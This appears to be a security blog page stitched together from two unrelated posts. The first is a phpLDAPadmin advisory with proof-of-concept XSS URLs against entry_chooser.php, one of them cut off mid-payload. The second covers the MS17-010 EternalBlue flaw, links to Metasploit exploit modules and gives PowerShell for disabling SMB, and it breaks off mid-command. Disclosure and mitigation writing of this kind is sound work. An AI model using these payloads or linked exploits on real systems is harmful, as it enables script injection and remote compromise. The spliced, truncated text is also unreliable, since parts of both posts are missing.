xD4rker

Software Description phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information. Vulnerability Description $request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage as it is demonstrated in this PoC video. Proof of Concept (PoC) XSS via the 'form' parameter: http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass): http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%

Thanks to @UnaPibaGeek & @pablogonzalezpe for their efforts to develop the Metasploit modules. Modules can be found here (Scanner + Exploit) : https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit This vulnerability affects Windows 2000, Windows XP, Windows 7, Windows 8, Windows Server 2000 up to 2012 R2. How to protect yourself If you still haven't updated your system, you should probably do it right away. If for some reason you aren't able to apply updates, Consider disabling SMB protocols. To disable SMBv1, SMBv2 and SMBv3 under Windows 8 and Windows Server 2012, run the following cmdlets (powershell commands) : Set-SmbServerConfiguration -EnableSMB1Protocol $false Set-SmbServerConfiguration -EnableSMB2Protocol $false For Windows 7, Windows Server 2008 R2, Windows Vista, and Windows Server 2008, you should use these: Set-Ite